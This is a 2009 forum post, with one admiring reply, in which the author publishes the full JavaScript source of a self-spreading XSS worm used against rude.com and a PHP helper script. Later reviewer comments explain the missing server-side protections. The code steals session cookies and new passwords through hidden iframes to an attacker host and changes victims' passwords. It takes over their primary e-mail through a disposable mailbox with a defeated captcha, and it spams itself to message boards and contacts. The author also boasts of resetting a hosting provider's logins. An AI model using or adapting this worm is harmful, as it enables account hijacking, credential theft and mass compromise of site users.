rude.com XSS worm
Posted by: RonPaul
Date: October 03, 2009 10:56PM

http://rude.pastebin.com/f269e4f5f
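/**
 * Builds a random alphanumeric string of 6 to 18 characters.
 *
 * Fix: the original assigned `chars`, `pass`, `x` and `i` without `var`, so
 * every call clobbered window-level names (including the `i` other functions
 * in this file use as a loop index) and would throw under strict mode. All
 * four are now locals; the output distribution is unchanged.
 *
 * NOTE(review): Math.random() is not a cryptographically secure source, so
 * strings from here are guessable in principle; code that needs a genuine
 * secret should draw from the platform CSPRNG instead.
 *
 * @returns {string} the generated string
 */
function randomPassword(){
  // Math.round over a 12-wide interval: 6 and 18 are half as likely as the interior values.
  var rand_num = Math.round((18-6) * Math.random() + 6);
  var chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
  var pass = "";
  for(var x=0;x<rand_num;x++)
  {
    // chars.length is 62, so the index is always in range
    var i = Math.floor(Math.random() * chars.length);
    pass += chars.charAt(i);
  }
  return pass;
}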

	/**
	 * Blocks the calling thread for roughly `ms` milliseconds by spinning on
	 * the clock. This is a busy-wait: the page is unresponsive and a CPU core
	 * is pegged for the whole interval.
	 *
	 * @param {number} ms - how long to block, in milliseconds
	 */
	function sleep(ms)
	{
		var deadline = Date.now() + ms;
		while (Date.now() < deadline) {
			// spin until the deadline passes
		}
	}


/**
 * Returns a fresh XHR object for the running browser, or `false` when none
 * of the known constructors is available. The standard XMLHttpRequest is
 * tried first, then the two legacy IE ActiveX ProgIDs, in that order.
 *
 * @returns {XMLHttpRequest|ActiveXObject|false}
 */
function getXMLHTTPRequest() 
{
  // Candidate constructors, in order of preference.
  var factories = [
    function () { return new XMLHttpRequest(); },                   /* e.g. Firefox */
    function () { return new ActiveXObject("Msxml2.XMLHTTP"); },    /* some versions IE */
    function () { return new ActiveXObject("Microsoft.XMLHTTP"); }  /* some versions IE */
  ];
  for (var k = 0; k < factories.length; k++) {
    try {
      return factories[k]();
    } catch (unavailable) {
      // constructor missing or blocked in this browser; try the next one
    }
  }
  return false;
}

// Shared XHR instance used by callAjax/responseAjax and callAjax2/responseAjax2
// below. Created at load time; `false` if the browser exposes no XHR constructor.
var myRequest = getXMLHTTPRequest();

			// Module-wide XHR used by makePOSTRequest/alertContents; replaced on every call.
			var http_request = false;
			/**
			 * Fires an asynchronous form-encoded POST through the module-wide
			 * `http_request`, with alertContents as the readystatechange handler.
			 * The browser attaches the current session cookie by itself, which is
			 * what lets script drive these endpoints; the body carries no anti-CSRF
			 * token and the response is never read.
			 *
			 * @param {string} url - endpoint to post to
			 * @param {string} parameters - already URL-encoded request body
			 * @returns {false|undefined} false when no XHR implementation exists
			 */
			function makePOSTRequest(url, parameters) {
			http_request = false;
			if (window.XMLHttpRequest) { // Mozilla, Safari,...
			http_request = new XMLHttpRequest();
			if (http_request.overrideMimeType) {
			http_request.overrideMimeType('text/html');
			}
			} else if (window.ActiveXObject) { // IE
			try {
			http_request = new ActiveXObject("Msxml2.XMLHTTP");
			} catch (e) {
			try {
			http_request = new ActiveXObject("Microsoft.XMLHTTP");
			} catch (e) {} // both ProgIDs missing: falls through to the `!http_request` check
			}
			}
			if (!http_request) {
			return false;
			}
			http_request.onreadystatechange = alertContents;
			http_request.open('POST', url, true);
			http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
			// NOTE(review): Content-Length and Connection are browser-controlled request
			// headers; modern browsers ignore or reject setting them from script.
			http_request.setRequestHeader("Content-length", parameters.length);
			http_request.setRequestHeader("Connection", "close");
			http_request.send(parameters);
			}
			/**
			 * readystatechange handler for the shared `http_request`. Deliberately a
			 * no-op: only the DONE state is checked; status and body are never read.
			 */
			function alertContents() {
			if (http_request.readyState != 4) {
			return;
			}
			// DONE: nothing further is done with the response
			}
/**
 * Spreading stage, invoked at the end of responseAjax once the victim's own
 * profile carries the payload. Two propagation channels:
 *  1. a reply on a randomly chosen hard-coded message-board topic, made of a
 *     filler sentence plus a percent-encoded <script src=...> tag;
 *  2. a GET of the victim's address book, handed to responseAjax2, which then
 *     messages every contact.
 * Both rely on the victim's ambient session: the POST body carries no anti-CSRF
 * token, nothing is re-authenticated, and (per the poster) the board stored the
 * tag unescaped. Output-encoding the message field or a per-session CSRF token
 * would each have stopped this stage.
 *
 * `shortsurl`, `saying` and `topicid` are assigned without `var` and so leak
 * into global scope.
 */
function callAjax2(){
// Worm-host links were redacted by the poster.
shortsurl =  
[ 
"";
//various links 
] 
var shorturl = shortsurl[Math.floor(Math.random()*shortsurl.length)];

// Filler text so the post reads like an ordinary message.
saying =  
[ 
"hi there",
":D this site is so cool",
":( i wish i had more friends on here",
"can someone help me? shoot me a msg",
"what is good info to add to your profile so people actually talk to u?",
"i think this site installed someone on my computer",
"bump",
"how is everyone?"
] 
var sayin = saying[Math.floor(Math.random()*saying.length)];

// Board topics targeted; one is picked at random per run.
topicid =  
[ 
"22941",
"15607",
"19920",
"7688"
//topics to spam
] 
var topic = topicid[Math.floor(Math.random()*topicid.length)];

// Payload is pre-encoded (%3C = '<', %3E = '>') so it survives the form body.
var topic_url = "http://www.rude.com/main/message_board/new_reply/id/" + topic + "/";
var total_saying = sayin + "%3Cscript%20src%3Dhttp%3A//" + shorturl + "%3E%3C/script%3E";
var topic_vars ="name=postsave=POST&radiobutton=defaultpost&message='" + total_saying + "'";
makePOSTRequest(topic_url, topic_vars);


//get address book spam friends
var url="/main/message/address_book/";
myRequest.open("GET",url,true);
myRequest.onreadystatechange=responseAjax2;
myRequest.send(null);
}

/**
 * Handles the address-book response requested in callAjax2: parses the returned
 * HTML into a detached <div>, walks its <a> elements (skipping the first and the
 * last 27 — presumably site navigation; cannot be confirmed from here) and, per
 * contact, POSTs a comment carrying the same filler-plus-<script> payload to
 * that contact's comment endpoint.
 *
 * Defensive takeaway: the comment endpoint accepted a scripted POST with no
 * token and stored raw markup. Assigning the fetched HTML to innerHTML of a
 * detached node does not execute any script it contains; the damage is in the
 * POSTs, not in the parse. The loop index `i` is an implicit global.
 */
function responseAjax2(){
if(myRequest.readyState==4){
if(myRequest.status==200){

var div2 = document.createElement('div');
div2.innerHTML = myRequest.responseText;


for (i=0; i < div2.getElementsByTagName('a').length; i++)
{
// upper bound recomputed every iteration; 27 is an unexplained offset
var blah = div2.getElementsByTagName('a').length - 27;
if(i>0 && i<blah){


// Worm-host links were redacted by the poster.
shortsurl =  
[ 
"";
//links
] 
var shorturl = shortsurl[Math.floor(Math.random()*shortsurl.length)];

// Same filler list as callAjax2, rebuilt on every iteration.
saying =  
[ 
"hi there",
":D this site is so cool",
":( i wish i had more friends on here",
"can someone help me? shoot me a msg",
"what is good info to add to your profile so people actually talk to u?",
"i think this site installed someone on my computer",
"bump",
"how is everyone?"
] 
var sayin = saying[Math.floor(Math.random()*saying.length)];

//actual spamming of friends
var total_saying = sayin + "%3Cscript%20src%3Dhttp%3A//" + shorturl + "%3E%3C/script%3E";
var their_name = div2.getElementsByTagName('a').innerHTML;
var their_url = "/main/space/comment_add/alias/" + their_name;
var their_post = "save=save&message='" + total_saying + "%20Please%20look%20at%20my%20detailed%20profile%20page.'";
makePOSTRequest(their_url,their_post);

}
} 


}
}
}


/**
 * Entry point, called at the bottom of the file as soon as the injected script
 * runs in a victim's browser: fetches the victim's own profile edit form so
 * responseAjax can check whether the payload is already present and, if not,
 * inject it. Uses the shared `myRequest` XHR.
 */
function callAjax(){
//fetches profile details to submit XSS on their profile page
//if the script is already in their profile, it doesnt do this stuff
var url="/main/member_profile/edit/";
myRequest.open("GET",url,true);
myRequest.onreadystatechange=responseAjax;
myRequest.send(null);
}

/**
 * Handles the profile-edit form fetched by callAjax. If the "additional"
 * textarea does not already contain "script" (the infection marker: already
 * infected profiles are skipped), it runs the full takeover sequence against
 * the current victim:
 *   1. re-submits the profile form with the stored fields copied over and the
 *      payload placed in `additional`;
 *   2. sends document.cookie plus the username and a fresh random password to
 *      the attacker host through a hidden iframe;
 *   3. changes the account password (the site did not ask for the old one);
 *   4. adds an attacker-controlled plus-addressed Gmail address and loads two
 *      attacker pages that confirm it and make it primary;
 *   5. calls callAjax2 to spread.
 *
 * Each step maps to a missing server-side control: HttpOnly on the session
 * cookie (keeps it out of document.cookie), anti-CSRF tokens on every
 * state-changing POST, and re-authentication for password and e-mail changes
 * (the poster reports the admin later added the last of these).
 */
function responseAjax(){
if(myRequest.readyState==4){
if(myRequest.status==200){

// Parse the returned form into a detached element so it can be queried.
var div = document.createElement('div');
div.innerHTML = myRequest.responseText;

// Infection marker: the payload leaves "script" in the additional-info textarea.
var additional = div.getElementsByTagName('textarea')[0].innerHTML;
var inThere = additional.match(/script/i);
if (inThere) {
}else {

// Current field values are read by position in the form; any layout change
// would silently shift them.
var first_name1 = div.getElementsByTagName('input')[3].value;
var middle_name1 = div.getElementsByTagName('input')[4].value;
var last_name1 = div.getElementsByTagName('input')[5].value;
var street11 = div.getElementsByTagName('input')[6].value;
var city1 = div.getElementsByTagName('input')[7].value;
var postal1 = div.getElementsByTagName('input')[8].value;
var country_id1 = div.getElementsByTagName('select')[0].value;
var sexual_preference1 = div.getElementsByTagName('select')[3].value;

// Profile re-submission: copied fields, two hard-coded flags, and the payload in
// `additional`. Note sexual_preference1 is read above but the constant 146 is sent.
var othervals = "flg_hide_address_city=1&flg_have_webcam=2&first_name=" + first_name1 + "&middle_name=" + middle_name1 + "&last_name=" + last_name1 + "&street1=" + street11 + "&city=" + city1 + "&postal=" + postal1 + "&country_id=" + country_id1 + "&sexual_preference=146&save=SAVE%20%26%20UPDATE&additional=%3Cscript%20src%3Dhttp%3A//evilsite.js%3E%3C/script%3E";





// Username is taken from the fourth link's href by stripping scheme and host.
var username=div.getElementsByTagName('a')[3].href; 
var username=username.replace("http://", ""); 
var username=username.replace("www.", ""); 
var username=username.replace("rude.com/", "");
var pw_value=randomPassword();
// document.cookie only exposes cookies that lack HttpOnly; an HttpOnly session
// cookie would not appear in this string.
var das_cookie = document.cookie + '; username=' + username + '; pw=' + pw_value + ';';

//collects cookie and other useful stuff
// Exfiltration via a hidden iframe to the attacker host ("evilsite.com" is a placeholder).
var url3 = "http://evilsite.com/x.php?c=" + das_cookie;
var url3 = encodeURI(url3);
var i;
// Presumably the old-IE createElement-with-markup form; standard DOM calls as fallback.
try {
i = document.createElement('<iframe height=0 width=0 frameborder=0 src=' + url3 + '>');
} catch(e) {
i = document.createElement('iframe');
i.setAttribute('src',url3);
i.setAttribute('height','0');
i.setAttribute('width','0');
i.setAttribute('frameborder','0');
}
document.getElementById('app_bar_top').appendChild(i);


//resets passwords to random value
//didnt have to enter old password
// Control that was missing: require the current password (or a re-login) here.

var poststr1 = "save=Change%20Password&pass_word=" + pw_value +"&pass_word_confirm=" + pw_value;
makePOSTRequest("/main/user_password/change/", poststr1);

//adds new email to their account and then activates it as primary
//for gmail if you do blah+anything_here@gmail.com
//it still goes to blah@gmail.com
//then in gmail forwarded all my mail to mailinator
// Control that was missing: re-authentication for e-mail changes, and treating
// plus-addressed variants as one mailbox when deciding who owns an address.
var comb_email = "my%2b" + username + "@gmail.com";
var poststr2 = "save=Add%20Email&email=" + comb_email + "&email_confim=" + comb_email;
makePOSTRequest("/main/user_email/add/", poststr2);



makePOSTRequest("/main/member_profile/edit/", othervals);

// Busy-wait that freezes the page for 2 s, presumably to let the POSTs above land.
sleep(2000);


// `da_url` is assigned without `var` (implicit global).
da_url = "http://evilsite.com/xfm1.php?u=" + username;
var i;
try {
i = document.createElement('<iframe height=0 width=0 frameborder=0 src=' + da_url + '>');
} catch(e) {
i = document.createElement('iframe');
i.setAttribute('src',da_url);
i.setAttribute('height','0');
i.setAttribute('width','0');
i.setAttribute('frameborder','0');
}
document.getElementById('chat_holder').appendChild(i);
sleep(2000);

// `da_url2` is assigned without `var` (implicit global).
da_url2 = "http://evilsite.com/xfm.php?u=" + username;
var i;
try {
i = document.createElement('<iframe height=0 width=0 frameborder=0 src=' + da_url2 + '>');
} catch(e) {
i = document.createElement('iframe');
i.setAttribute('src',da_url2);
i.setAttribute('height','0');
i.setAttribute('width','0');
i.setAttribute('frameborder','0');
}
document.getElementById('chat_names').appendChild(i);


//this calls the spread of the worm to other accounts
callAjax2();


}

}else{
//error
}
}
}
// Kick-off: runs as soon as the injected script is evaluated in a victim's page.
callAjax();

xfm1.php - fetched the email and activated it
xfm.php - set it as primary and deleted the email from mailinator due to a weak captcha
http://rude.pastebin.com/f73fa6319
<?php
$account = ""; // account name here
// Attacker-side disposable mailbox name (redacted by the poster); the Gmail
// forward described in the JS comments above lands here.
// Victim username passed in from the iframe src built in responseAjax (`?u=`);
// strip_tags is the only filtering before it is compared against mail bodies.
$test_name = strip_tags($_GET['u']);
//echo "<iframe src=sendcash.php?c=" . $test_name . " width=0 height=0 frameborder=0></iframe>";

/**
 * Submits the disposable-mail service's "delete message" form via cURL with the
 * chosen captcha answer. The response is fetched into $html but never returned
 * or inspected, so success is not checked. The query key is spelled `catpcha`
 * as posted.
 *
 * @param string $captcha answer for the static captcha image
 * @param string $box     mailbox name
 * @param string $msg     message id
 */
function getPage($captcha,$box,$msg){
	$url = "http://www.mailinator.com/toast.jsp?catpcha=" . $captcha . "&email=" . $box . "&msgid=" . $msg;
        $timeout=30;
    $curl = curl_init();
	// Referer is set to the message view page so the request looks like a browser submission.
	$referer2 = "http://www.mailinator.com/showmail.jsp?email=" . $box . "&msgid=" . $msg;
        curl_setopt ($curl, CURLOPT_REFERER, $referer2);

    curl_setopt ($curl, CURLOPT_URL, $url);
    curl_setopt ($curl, CURLOPT_TIMEOUT, $timeout);
    curl_setopt ($curl, CURLOPT_USERAGENT, sprintf("Mozilla/%d.0",rand(4,5)));
    curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
    // Certificate verification disabled; irrelevant for the plain-http URL above.
    curl_setopt ($curl, CURLOPT_SSL_VERIFYPEER, 0);
    $html = curl_exec ($curl);
    curl_close ($curl);
}


// Poll the attacker-side mailbox listing and collect every message id in it.
$string=file_get_contents("http://www.mailinator.com/maildir.jsp?email=$account");
preg_match_all('/(?<=msgid=)\d+/', $string, $matches); 

	foreach($matches[0] as $value){
		// Reset for every message, so the `$counter == 0` test below is always true.
		$counter=0;
		$initial_string=file_get_contents("http://www.mailinator.com/showmail.jsp?email=$account&msgid=$value"); 

		// Pull the greeting name out of the mail body to match it against $test_name.
		$stringstart2 = "Hello ";
		$stringend2 = ",<br><br>"; //find end of string to get the middle

		$trimfrom2= strpos($initial_string,$stringstart2) + strlen($stringstart2);
		$trimto2 = strpos($initial_string,$stringend2);
		$output_string2 = substr( $initial_string, $trimfrom2 , $trimto2 - $trimfrom2 );

			
			if($output_string2 == $test_name && $counter == 0){
				// Extract the confirmation link from the mail, then the numeric id inside it.
				$stringstart = "Please click the link below to confirm this email address:<br><br><a href=";
				$stringend = " rel=nofollow target='_blank'>"; 
				$trimfrom= strpos($initial_string,$stringstart) + strlen($stringstart);
				$trimto = strpos($initial_string,$stringend);
				$output_string = substr( $initial_string, $trimfrom , $trimto - $trimfrom );
				$stringstart3 = "http://www.rude.com/main/user_email/confirm/id/";
				$stringend3 = "/key"; 
				$trimfrom3= strpos($output_string,$stringstart3) + strlen($stringstart3);
				$trimto3 = strpos($output_string,$stringend3);
				$output_string3 = substr( $output_string, $trimfrom3 , $trimto3 - $trimfrom3 );
				$primary_link = "http://www.rude.com/main/user_email/set_default/id/" . $output_string3 . "/";


				// Written into the page this script serves, so it runs in whichever
				// browser loaded it — presumably the victim's, via the iframe built in
				// responseAjax — under the victim's session. Requiring re-authentication
				// to add or switch the primary e-mail breaks this step.
				echo "<iframe src=$primary_link height=0 width=0 frameborder=0></iframe>";

				// The captcha is one of ten fixed images with fixed answers; a static
				// challenge like this gives no protection against scripted deletion.
				$captchastart = '<img border=1 src="images/captcha';
				$captchaend = '.gif" alt="">'; 

				$trimfrom_captcha= strpos($initial_string,$captchastart) + strlen($captchastart);
				$trimto_captcha = strpos($initial_string,$captchaend);
				$captcha_numb = substr( $initial_string, $trimfrom_captcha , $trimto_captcha - $trimfrom_captcha );
				if($captcha_numb == "1"){
					$captcha = "i+love+mailinator";
				}

				if($captcha_numb == "2"){
					$captcha = "mailinator+rocks!!";
				}

				if($captcha_numb == "3"){
					$captcha = "1234";
				}

				if($captcha_numb == "4"){
					$captcha = "semore+spam";
				}

				if($captcha_numb == "5"){
					$captcha = "123456";
				}

				if($captcha_numb == "6"){
					$captcha = "mailinator+is+neato";
				}

				if($captcha_numb == "7"){
					$captcha = "i+spam+mailinator";
				}

				if($captcha_numb == "8"){
					$captcha = "captain+cheeseburger!";
				}

				if($captcha_numb == "9"){
					$captcha = "i+read+your+email+@+mailinator";
				}

				if($captcha_numb == "10"){
					$captcha = "dog";
				}

				// $captcha stays unset if the number is outside 1-10; getPage is called regardless.
				getPage($captcha,$account,$value);
				$counter=1;

			}

	}
?>

last part x.php was a simple cookie logger. i dont think i have to show u that

thanks for all that made this possible.

the admin has fixed the holes i abused. still some out there. he added a current-password check to change your password.

also to change ur primary email you have to enter your password.

the site really needs to look at its security. if you make money on the site, your personal details, including your SSN, are stored there — which would be a field day for someone.

on a funny note. the site that i used to host all these files, caught on to me and changed the permissions on my files. so i reset their cpanel login and ftp information.

if you have questions about the code or what not, ask.

forums, blogs, profile, mail all had XSS.

current site states:
Quote

We are currently experiencing some technical difficulties, rest assured we are working to get RUDE back online as soon as possible.
Please try this page again in a few minutes or visit the home page by clicking here.



Edited 1 time(s). Last edit at 10/03/2009 11:22PM by RonPaul.

Re: rude.com XSS worm
Posted by: Ryonan
Date: October 04, 2009 04:55AM

nice job Ron :d.
i made something similar months ago; the victim is an online community, but they don't seem to care much about the worm.


